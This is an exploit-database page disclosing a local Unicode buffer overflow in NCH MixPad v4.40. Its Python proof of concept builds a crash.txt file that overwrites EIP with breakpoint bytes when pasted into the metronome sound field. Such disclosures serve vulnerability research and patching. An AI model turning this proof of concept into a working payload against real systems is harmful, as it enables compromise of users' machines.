MixPad v4.40 - Unicode Buffer Overflow

2018.12.12
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Author: Gionathan "John" Reale # Exploit Title: NCH Software MixPad v4.40 - Unicode Buffer Overflow # Date: 2018-12-12 # Vulnerable Software: NCH Software MixPad # Vendor Homepage: http://www.nch.com.au/ # Version: v4.40-v4.10 # Tested On: Windows 7 # # PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' filename="crash.txt" junk = "A"*249 eip = "\xcc"*2 fill = "B"*100 buffer = junk + eip + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top